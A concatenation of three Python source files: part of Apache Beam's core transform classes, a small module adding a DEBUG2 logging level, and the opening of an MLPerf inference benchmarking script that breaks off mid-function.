@typehints.with_input_types(typing.Tuple[K, V])
@typehints.with_output_types(typing.Tuple[K, typing.Iterable[V]])
class GroupByKey(PTransform):
"""A group by key transform.
Processes an input PCollection consisting of key/value pairs represented as a
tuple pair. The result is a PCollection where values having a common key are
  grouped together. For example (a, 1), (b, 2), (a, 3) will result in
  (a, [1, 3]), (b, [2]).
The implementation here is used only when run on the local direct runner.
"""
class ReifyWindows(DoFn):
def process(
self, element, window=DoFn.WindowParam, timestamp=DoFn.TimestampParam):
try:
k, v = element
except TypeError:
raise TypeCheckError(
'Input to GroupByKey must be a PCollection with '
'elements compatible with KV[A, B]')
return [(k, WindowedValue(v, timestamp, [window]))]
def infer_output_type(self, input_type):
key_type, value_type = trivial_inference.key_value_types(input_type)
return typehints.Iterable[typehints.KV[
key_type, typehints.WindowedValue[value_type]]] # type: ignore[misc]
def expand(self, pcoll):
# This code path is only used in the local direct runner. For Dataflow
# runner execution, the GroupByKey transform is expanded on the service.
input_type = pcoll.element_type
if input_type is not None:
# Initialize type-hints used below to enforce type-checking and to pass
# downstream to further PTransforms.
key_type, value_type = trivial_inference.key_value_types(input_type)
# Enforce the input to a GBK has a KV element type.
pcoll.element_type = typehints.KV[key_type, value_type]
typecoders.registry.verify_deterministic(
typecoders.registry.get_coder(key_type),
'GroupByKey operation "%s"' % self.label)
reify_output_type = typehints.KV[
key_type, typehints.WindowedValue[value_type]] # type: ignore[misc]
gbk_input_type = (
typehints.KV[key_type,
typehints.Iterable[typehints.WindowedValue[value_type]]]
) # type: ignore[misc]
gbk_output_type = typehints.KV[key_type, typehints.Iterable[value_type]]
# pylint: disable=bad-continuation
return (
pcoll
| 'ReifyWindows' >>
(ParDo(self.ReifyWindows()).with_output_types(reify_output_type))
| 'GroupByKey' >> (
_GroupByKeyOnly().with_input_types(
reify_output_type).with_output_types(gbk_input_type))
| (
'GroupByWindow' >>
_GroupAlsoByWindow(pcoll.windowing).with_input_types(
gbk_input_type).with_output_types(gbk_output_type)))
else:
# The input_type is None, run the default
return (
pcoll
| 'ReifyWindows' >> ParDo(self.ReifyWindows())
| 'GroupByKey' >> _GroupByKeyOnly()
| 'GroupByWindow' >> _GroupAlsoByWindow(pcoll.windowing))
def infer_output_type(self, input_type):
key_type, value_type = trivial_inference.key_value_types(input_type)
return typehints.KV[key_type, typehints.Iterable[value_type]]
def to_runner_api_parameter(self, unused_context):
# type: (PipelineContext) -> typing.Tuple[str, None]
return common_urns.primitives.GROUP_BY_KEY.urn, None
@staticmethod
@PTransform.register_urn(common_urns.primitives.GROUP_BY_KEY.urn, None)
def from_runner_api_parameter(unused_payload, unused_context):
return GroupByKey()
def runner_api_requires_keyed_input(self):
return True
@typehints.with_input_types(typing.Tuple[K, V])
@typehints.with_output_types(typing.Tuple[K, typing.Iterable[V]])
class _GroupByKeyOnly(PTransform):
"""A group by key transform, ignoring windows."""
def infer_output_type(self, input_type):
key_type, value_type = trivial_inference.key_value_types(input_type)
return typehints.KV[key_type, typehints.Iterable[value_type]]
def expand(self, pcoll):
self._check_pcollection(pcoll)
return pvalue.PCollection.from_(pcoll)
@typehints.with_input_types(typing.Tuple[K, typing.Iterable[V]])
@typehints.with_output_types(typing.Tuple[K, typing.Iterable[V]])
class _GroupAlsoByWindow(ParDo):
"""The GroupAlsoByWindow transform."""
def __init__(self, windowing):
super(_GroupAlsoByWindow, self).__init__(_GroupAlsoByWindowDoFn(windowing))
self.windowing = windowing
def expand(self, pcoll):
self._check_pcollection(pcoll)
return pvalue.PCollection.from_(pcoll)
class _GroupAlsoByWindowDoFn(DoFn):
# TODO(robertwb): Support combiner lifting.
def __init__(self, windowing):
super(_GroupAlsoByWindowDoFn, self).__init__()
self.windowing = windowing
def infer_output_type(self, input_type):
key_type, windowed_value_iter_type = trivial_inference.key_value_types(
input_type)
value_type = windowed_value_iter_type.inner_type.inner_type
return typehints.Iterable[typehints.KV[key_type,
typehints.Iterable[value_type]]]
def start_bundle(self):
# pylint: disable=wrong-import-order, wrong-import-position
from apache_beam.transforms.trigger import create_trigger_driver
# pylint: enable=wrong-import-order, wrong-import-position
self.driver = create_trigger_driver(self.windowing, True)
def process(self, element):
k, vs = element
return self.driver.process_entire_key(k, vs)
class Partition(PTransformWithSideInputs):
"""Split a PCollection into several partitions.
Uses the specified PartitionFn to separate an input PCollection into the
specified number of sub-PCollections.
  When applied, a Partition() PTransform requires the following:
Args:
partitionfn: a PartitionFn, or a callable with the signature described in
CallableWrapperPartitionFn.
n: number of output partitions.
The result of this PTransform is a simple list of the output PCollections
representing each of n partitions, in order.
"""
class ApplyPartitionFnFn(DoFn):
"""A DoFn that applies a PartitionFn."""
def process(self, element, partitionfn, n, *args, **kwargs):
partition = partitionfn.partition_for(element, n, *args, **kwargs)
if not 0 <= partition < n:
raise ValueError(
'PartitionFn specified out-of-bounds partition index: '
'%d not in [0, %d)' % (partition, n))
# Each input is directed into the output that corresponds to the
# selected partition.
yield pvalue.TaggedOutput(str(partition), element)
def make_fn(self, fn, has_side_inputs):
return fn if isinstance(fn, PartitionFn) else CallableWrapperPartitionFn(fn)
def expand(self, pcoll):
n = int(self.args[0])
return pcoll | ParDo(
self.ApplyPartitionFnFn(), self.fn, *self.args, **
self.kwargs).with_outputs(*[str(t) for t in range(n)])
class Windowing(object):
def __init__(self,
windowfn, # type: WindowFn
triggerfn=None, # type: typing.Optional[TriggerFn]
accumulation_mode=None, # type: typing.Optional[beam_runner_api_pb2.AccumulationMode]
timestamp_combiner=None, # type: typing.Optional[beam_runner_api_pb2.OutputTime]
allowed_lateness=0, # type: typing.Union[int, float]
):
"""Class representing the window strategy.
Args:
windowfn: Window assign function.
triggerfn: Trigger function.
      accumulation_mode: an AccumulationMode, controls what to do with data
when a trigger fires multiple times.
timestamp_combiner: a TimestampCombiner, determines how output
timestamps of grouping operations are assigned.
      allowed_lateness: Maximum delay, in seconds, after the end of the
        window during which late data may still be processed; data arriving
        later than this is discarded.
"""
global AccumulationMode, DefaultTrigger # pylint: disable=global-variable-not-assigned
# pylint: disable=wrong-import-order, wrong-import-position
from apache_beam.transforms.trigger import AccumulationMode, DefaultTrigger
# pylint: enable=wrong-import-order, wrong-import-position
if triggerfn is None:
triggerfn = DefaultTrigger()
if accumulation_mode is None:
if triggerfn == DefaultTrigger():
accumulation_mode = AccumulationMode.DISCARDING
else:
raise ValueError(
'accumulation_mode must be provided for non-trivial triggers')
if not windowfn.get_window_coder().is_deterministic():
raise ValueError(
          'window fn (%s) does not have a deterministic coder (%s)' %
(windowfn, windowfn.get_window_coder()))
self.windowfn = windowfn
self.triggerfn = triggerfn
self.accumulation_mode = accumulation_mode
self.allowed_lateness = Duration.of(allowed_lateness)
self.timestamp_combiner = (
timestamp_combiner or TimestampCombiner.OUTPUT_AT_EOW)
self._is_default = (
self.windowfn == GlobalWindows() and
self.triggerfn == DefaultTrigger() and
self.accumulation_mode == AccumulationMode.DISCARDING and
self.timestamp_combiner == TimestampCombiner.OUTPUT_AT_EOW and
self.allowed_lateness == 0)
def __repr__(self):
return "Windowing(%s, %s, %s, %s)" % (
self.windowfn,
self.triggerfn,
self.accumulation_mode,
self.timestamp_combiner)
def __eq__(self, other):
if type(self) == type(other):
if self._is_default and other._is_default:
return True
return (
self.windowfn == other.windowfn and
self.triggerfn == other.triggerfn and
self.accumulation_mode == other.accumulation_mode and
self.timestamp_combiner == other.timestamp_combiner and
self.allowed_lateness == other.allowed_lateness)
return False
def __ne__(self, other):
# TODO(BEAM-5949): Needed for Python 2 compatibility.
return not self == other
def __hash__(self):
return hash((
self.windowfn,
self.triggerfn,
self.accumulation_mode,
self.allowed_lateness,
self.timestamp_combiner))
def is_default(self):
return self._is_default
def to_runner_api(self, context):
# type: (PipelineContext) -> beam_runner_api_pb2.WindowingStrategy
return beam_runner_api_pb2.WindowingStrategy(
window_fn=self.windowfn.to_runner_api(context),
# TODO(robertwb): Prohibit implicit multi-level merging.
merge_status=(
beam_runner_api_pb2.MergeStatus.NEEDS_MERGE
if self.windowfn.is_merging() else
beam_runner_api_pb2.MergeStatus.NON_MERGING),
window_coder_id=context.coders.get_id(self.windowfn.get_window_coder()),
trigger=self.triggerfn.to_runner_api(context),
accumulation_mode=self.accumulation_mode,
output_time=self.timestamp_combiner,
# TODO(robertwb): Support EMIT_IF_NONEMPTY
closing_behavior=beam_runner_api_pb2.ClosingBehavior.EMIT_ALWAYS,
OnTimeBehavior=beam_runner_api_pb2.OnTimeBehavior.FIRE_ALWAYS,
allowed_lateness=self.allowed_lateness.micros // 1000,
environment_id=context.default_environment_id())
@staticmethod
def from_runner_api(proto, context):
# pylint: disable=wrong-import-order, wrong-import-position
from apache_beam.transforms.trigger import TriggerFn
return Windowing(
windowfn=WindowFn.from_runner_api(proto.window_fn, context),
triggerfn=TriggerFn.from_runner_api(proto.trigger, context),
accumulation_mode=proto.accumulation_mode,
timestamp_combiner=proto.output_time,
allowed_lateness=Duration(micros=proto.allowed_lateness * 1000))
@typehints.with_input_types(T)
@typehints.with_output_types(T)
class WindowInto(ParDo):
"""A window transform assigning windows to each element of a PCollection.
Transforms an input PCollection by applying a windowing function to each
element. Each transformed element in the result will be a WindowedValue
element with the same input value and timestamp, with its new set of windows
determined by the windowing function.
"""
class WindowIntoFn(DoFn):
"""A DoFn that applies a WindowInto operation."""
def __init__(self, windowing):
# type: (Windowing) -> None
self.windowing = windowing
def process(
self, element, timestamp=DoFn.TimestampParam, window=DoFn.WindowParam):
context = WindowFn.AssignContext(
timestamp, element=element, window=window)
new_windows = self.windowing.windowfn.assign(context)
yield WindowedValue(element, context.timestamp, new_windows)
def __init__(self,
windowfn, # type: typing.Union[Windowing, WindowFn]
trigger=None, # type: typing.Optional[TriggerFn]
accumulation_mode=None,
timestamp_combiner=None,
allowed_lateness=0):
"""Initializes a WindowInto transform.
Args:
windowfn (Windowing, WindowFn): Function to be used for windowing.
trigger: (optional) Trigger used for windowing, or None for default.
accumulation_mode: (optional) Accumulation mode used for windowing,
required for non-trivial triggers.
      timestamp_combiner: (optional) Timestamp combiner used for windowing,
or None for default.
"""
if isinstance(windowfn, Windowing):
# Overlay windowing with kwargs.
windowing = windowfn
windowfn = windowing.windowfn
# Use windowing to fill in defaults for the extra arguments.
trigger = trigger or windowing.triggerfn
accumulation_mode = accumulation_mode or windowing.accumulation_mode
timestamp_combiner = timestamp_combiner or windowing.timestamp_combiner
self.windowing = Windowing(
windowfn,
trigger,
accumulation_mode,
timestamp_combiner,
allowed_lateness)
super(WindowInto, self).__init__(self.WindowIntoFn(self.windowing))
def get_windowing(self, unused_inputs):
# type: (typing.Any) -> Windowing
return self.windowing
def infer_output_type(self, input_type):
return input_type
def expand(self, pcoll):
input_type = pcoll.element_type
if input_type is not None:
output_type = input_type
self.with_input_types(input_type)
self.with_output_types(output_type)
return super(WindowInto, self).expand(pcoll)
def to_runner_api_parameter(self, context):
# type: (PipelineContext) -> typing.Tuple[str, message.Message]
return (
common_urns.primitives.ASSIGN_WINDOWS.urn,
self.windowing.to_runner_api(context))
@staticmethod
def from_runner_api_parameter(proto, context):
windowing = Windowing.from_runner_api(proto, context)
return WindowInto(
windowing.windowfn,
trigger=windowing.triggerfn,
accumulation_mode=windowing.accumulation_mode,
timestamp_combiner=windowing.timestamp_combiner)
PTransform.register_urn(
common_urns.primitives.ASSIGN_WINDOWS.urn,
# TODO(robertwb): Update WindowIntoPayload to include the full strategy.
# (Right now only WindowFn is used, but we need this to reconstitute the
# WindowInto transform, and in the future will need it at runtime to
# support meta-data driven triggers.)
# TODO(robertwb): Use a reference rather than embedding?
beam_runner_api_pb2.WindowingStrategy,
WindowInto.from_runner_api_parameter)
# Python's pickling is broken for nested classes.
WindowIntoFn = WindowInto.WindowIntoFn
class Flatten(PTransform):
"""Merges several PCollections into a single PCollection.
Copies all elements in 0 or more PCollections into a single output
PCollection. If there are no input PCollections, the resulting PCollection
will be empty (but see also kwargs below).
Args:
**kwargs: Accepts a single named argument "pipeline", which specifies the
pipeline that "owns" this PTransform. Ordinarily Flatten can obtain this
information from one of the input PCollections, but if there are none (or
if there's a chance there may be none), this argument is the only way to
provide pipeline information and should be considered mandatory.
"""
def __init__(self, **kwargs):
super(Flatten, self).__init__()
self.pipeline = kwargs.pop(
'pipeline', None) # type: typing.Optional[Pipeline]
if kwargs:
raise ValueError('Unexpected keyword arguments: %s' % list(kwargs))
def _extract_input_pvalues(self, pvalueish):
try:
pvalueish = tuple(pvalueish)
except TypeError:
raise ValueError(
'Input to Flatten must be an iterable. '
'Got a value of type %s instead.' % type(pvalueish))
return pvalueish, pvalueish
def expand(self, pcolls):
for pcoll in pcolls:
self._check_pcollection(pcoll)
is_bounded = all(pcoll.is_bounded for pcoll in pcolls)
result = pvalue.PCollection(self.pipeline, is_bounded=is_bounded)
result.element_type = typehints.Union[tuple(
pcoll.element_type for pcoll in pcolls)]
return result
def get_windowing(self, inputs):
# type: (typing.Any) -> Windowing
if not inputs:
# TODO(robertwb): Return something compatible with every windowing?
return Windowing(GlobalWindows())
return super(Flatten, self).get_windowing(inputs)
def to_runner_api_parameter(self, context):
# type: (PipelineContext) -> typing.Tuple[str, None]
return common_urns.primitives.FLATTEN.urn, None
@staticmethod
def from_runner_api_parameter(unused_parameter, unused_context):
return Flatten()
PTransform.register_urn(
common_urns.primitives.FLATTEN.urn, None, Flatten.from_runner_api_parameter)
class Create(PTransform):
"""A transform that creates a PCollection from an iterable."""
def __init__(self, values, reshuffle=True):
"""Initializes a Create transform.
Args:
      values: An iterable of elements for the PCollection; a dict contributes
        its (key, value) items.
      reshuffle: Whether to redistribute the created elements across workers
        (defaults to True).
"""
super(Create, self).__init__()
if isinstance(values, (unicode, str, bytes)):
raise TypeError(
'PTransform Create: Refusing to treat string as '
'an iterable. (string=%r)' % values)
elif isinstance(values, dict):
values = values.items()
self.values = tuple(values)
self.reshuffle = reshuffle
def to_runner_api_parameter(self, context):
# type: (PipelineContext) -> typing.Tuple[str, bytes]
# Required as this is identified by type in PTransformOverrides.
# TODO(BEAM-3812): Use an actual URN here.
return self.to_runner_api_pickled(context)
def infer_output_type(self, unused_input_type):
if not self.values:
return typehints.Any
return typehints.Union[[
trivial_inference.instance_to_type(v) for v in self.values
]]
def get_output_type(self):
return (
self.get_type_hints().simple_output_type(self.label) or
self.infer_output_type(None))
def expand(self, pbegin):
assert isinstance(pbegin, pvalue.PBegin)
coder = typecoders.registry.get_coder(self.get_output_type())
serialized_values = [coder.encode(v) for v in self.values]
reshuffle = self.reshuffle
# Avoid the "redistributing" reshuffle for 0 and 1 element Creates.
# These special cases are often used in building up more complex
# transforms (e.g. Write).
class MaybeReshuffle(PTransform):
def expand(self, pcoll):
if len(serialized_values) > 1 and reshuffle:
from apache_beam.transforms.util import Reshuffle
return pcoll | Reshuffle()
else:
return pcoll
return (
pbegin
| Impulse()
| FlatMap(lambda _: serialized_values).with_output_types(bytes)
| MaybeReshuffle().with_output_types(bytes)
| Map(coder.decode).with_output_types(self.get_output_type()))
def as_read(self):
from apache_beam.io import iobase
coder = typecoders.registry.get_coder(self.get_output_type())
source = self._create_source_from_iterable(self.values, coder)
return iobase.Read(source).with_output_types(self.get_output_type())
def get_windowing(self, unused_inputs):
# type: (typing.Any) -> Windowing
return Windowing(GlobalWindows())
@staticmethod
def _create_source_from_iterable(values, coder):
return Create._create_source(list(map(coder.encode, values)), coder)
@staticmethod
def _create_source(serialized_values, coder):
# type: (typing.Any, typing.Any) -> create_source._CreateSource
from apache_beam.transforms.create_source import _CreateSource
return _CreateSource(serialized_values, coder)
@typehints.with_output_types(bytes)
class Impulse(PTransform):
"""Impulse primitive."""
def expand(self, pbegin):
if not isinstance(pbegin, pvalue.PBegin):
raise TypeError(
'Input to Impulse transform must be a PBegin but found %s' % pbegin)
return pvalue.PCollection(pbegin.pipeline)
def get_windowing(self, inputs):
# type: (typing.Any) -> Windowing
return Windowing(GlobalWindows())
def infer_output_type(self, unused_input_type):
return bytes
def to_runner_api_parameter(self, unused_context):
# type: (PipelineContext) -> typing.Tuple[str, None]
return common_urns.primitives.IMPULSE.urn, None
@staticmethod
@PTransform.register_urn(common_urns.primitives.IMPULSE.urn, None)
def from_runner_api_parameter(unused_parameter, unused_context):
return Impulse()
|
py | b415a3b57103de0322bd86433929f7dce1d6b5e0 | import logging
from typing import Any
from cached_property import cached_property
DEBUG2_LEVEL_NUM = 8
class ExtendedDebugLogger(logging.Logger):
@cached_property
def show_debug2(self) -> bool:
return self.isEnabledFor(DEBUG2_LEVEL_NUM)
def debug2(self, message: str, *args: Any, **kwargs: Any) -> None:
if self.show_debug2:
self.log(DEBUG2_LEVEL_NUM, message, *args, **kwargs)
def setup_extended_logging() -> None:
logging.setLoggerClass(ExtendedDebugLogger)
logging.addLevelName(DEBUG2_LEVEL_NUM, 'DEBUG2')
    setattr(logging, 'DEBUG2', DEBUG2_LEVEL_NUM)  # type: ignore
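# Usage sketch (assumed for illustration): install the logger class before any
# loggers are created, then the extra DEBUG2 level becomes available.
#
#   setup_extended_logging()
#   logger = logging.getLogger('p2p')          # an ExtendedDebugLogger
#   logger.debug2('low-level detail: %s', 42)  # emitted only if level <= DEBUG2 (8)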
|
py | b415a48136919725f74074a98b04678cc7d61720 | """
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import json
import logging
import os
import time
import sys
import tqdm
import numpy as np
import dataset
import imagenet
import coco
from more_itertools import chunked
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet": (
imagenet.Imagenet,
dataset.pre_process_vgg,
dataset.PostProcessCommon(offset=0),
{"image_size": [224, 224, 3]},
),
"imagenet_mobilenet": (
imagenet.Imagenet,
dataset.pre_process_mobilenet,
dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]},
),
"imagenet_pytorch": (
imagenet.Imagenet,
dataset.pre_process_imagenet_pytorch,
dataset.PostProcessArgMax(offset=0),
{"image_size": [224, 224, 3]},
),
"coco-300": (
coco.Coco,
dataset.pre_process_coco_mobilenet,
coco.PostProcessCoco(),
{"image_size": [300, 300, 3]},
),
"coco-300-pt": (
coco.Coco,
dataset.pre_process_coco_pt_mobilenet,
coco.PostProcessCocoPt(False, 0.3),
{"image_size": [300, 300, 3]},
),
"coco-1200": (
coco.Coco,
dataset.pre_process_coco_resnet34,
coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]},
),
"coco-1200-onnx": (
coco.Coco,
dataset.pre_process_coco_resnet34,
coco.PostProcessCocoPt(True, 0.05),
{"image_size": [1200, 1200, 3], "use_label_map": True},
),
"coco-1200-pt": (
coco.Coco,
dataset.pre_process_coco_resnet34,
coco.PostProcessCocoPt(True, 0.05),
{"image_size": [1200, 1200, 3], "use_label_map": True},
),
"coco-1200-tf": (
coco.Coco,
dataset.pre_process_coco_resnet34,
coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3], "use_label_map": False},
),
#
# furiosa golden pre/post-process
#
"imagenet-golden": (
imagenet.Imagenet,
dataset.pre_process_vgg,
dataset.PostProcessArgMax(offset=0),
{"image_size": [224, 224, 3]},
),
"coco-300-golden": (
coco.Coco,
dataset.pre_process_coco_pt_mobilenet,
coco.PostProcessCocoSSDMobileNetORT(False, 0.3),
{"image_size": [300, 300, 3]},
),
"coco-1200-golden": (
coco.Coco,
dataset.pre_process_coco_resnet34,
coco.PostProcessCocoONNXNP(),
{"image_size": [1200, 1200, 3], "use_label_map": False},
),
}
# pre-defined command line options to simplify things. They are used as defaults and can be
# overwritten from command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
#
# furiosa golden model setting
#
"ssd-resnet-golden": {
"dataset": "imagenet-golden",
"backend": "onnxruntime",
"model-name": "resnet50",
},
"ssd-mobilenet-golden": {
"dataset": "coco-300-golden",
"backend": "onnxruntime",
"data-format": "NCHW",
"model-name": "ssd-mobilenet",
},
"ssd-resnet34-golden": {
"dataset": "coco-1200-golden",
"backend": "onnxruntime",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
#
# furiosa npu runtime backend setting
#
"resnet-golden-npu-legacy": {
"inputs": "input_tensor:0",
"outputs": "resnet_model/Squeeze:0_fused_dequantized",
"dataset": "imagenet-golden",
"backend": "npuruntime",
"model-name": "resnet50",
},
"ssd-mobilenet-golden-npu-legacy": {
"inputs": "image",
"outputs": "class_logit_0_dequantized,class_logit_1_dequantized,class_logit_2_dequantized,"
"class_logit_3_dequantized,class_logit_4_dequantized,class_logit_5_dequantized,"
"box_regression_0_dequantized,box_regression_1_dequantized,box_regression_2_dequantized,"
"box_regression_3_dequantized,box_regression_4_dequantized,box_regression_5_dequantized,",
"dataset": "coco-300-golden",
"backend": "npuruntime",
"data-format": "NCHW",
"model-name": "ssd-mobilenet",
},
"ssd-resnet34-golden-npu-legacy": {
"inputs": "image:0",
"outputs": "ssd1200/multibox_head/cls_0/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/cls_1/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/cls_2/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/cls_3/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/cls_4/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/cls_5/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/loc_0/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/loc_1/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/loc_2/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/loc_3/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/loc_4/BiasAdd:0_dequantized,"
"ssd1200/multibox_head/loc_5/BiasAdd:0_dequantized",
"dataset": "coco-1200-golden",
"backend": "npuruntime",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument(
"-b", "--max-batchsize", default=1, type=int, help="max batch size in a single inference"
)
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", default="eval_result", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--model-name", help="name of the mlperf model, ie. resnet50")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument(
"--cache_dir", type=str, default=None, help="path to save preprocessed dataset"
)
parser.add_argument(
"--accuracy", default=True, action="store_true", help="enable accuracy pass"
)
parser.add_argument(
"--find-peak-performance", action="store_true", help="enable finding peak performance pass"
)
parser.add_argument("--debug", action="store_true", help="debug, turn traces on")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument(
"--user_conf",
default="user.conf",
help="user config for user LoadGen settings such as target QPS",
)
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("-n", "--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument(
"--samples-per-query", type=int, help="mlperf multi-stream sample per query"
)
args = parser.parse_args()
    # don't use defaults in argparse. Instead we default to a dict, override that with a profile
    # and take this as the default unless the command line gives a value
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
return args
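# Sketch of the precedence implemented above (values assumed for illustration):
# the built-in defaults are updated by the selected profile, and either only
# takes effect for flags the user did not pass explicitly.
#
#   defaults = {"dataset": "imagenet", "backend": "tensorflow"}
#   defaults.update(SUPPORTED_PROFILES["resnet50-onnxruntime"])  # backend -> "onnxruntime"
#   # args.backend is None unless --backend was given, so it becomes
#   # "onnxruntime"; an explicit --backend tensorflow would win instead.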
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
elif backend == "npuruntime":
from backend_npuruntime import BackendNPURuntime
backend = BackendNPURuntime()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
try:
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results = self.post_process(
results, qitem.content_id, qitem.label, self.result_dict
)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
src = [self.ds.get_item_loc(i) for i in qitem.content_id]
log.error("thread: failed on contentid=%s, %s", src, ex)
sys.exit(1)
def enqueue(self, query_samples, pbar):
query_id = idx = list(query_samples.keys())
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
pbar.update(len(query_samples))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i : i + bs])
self.run_one_item(Item(query_id[i : i + bs], idx[i : i + bs], data, label))
pbar.update(bs)
def finish(self):
pass
def add_results(final_results, name, count, result_dict, result_list, took, show_accuracy=False):
percentiles = [50.0, 80.0, 90.0, 95.0, 99.0, 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": count,
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100.0 * result_dict["good"] / result_dict["total"]
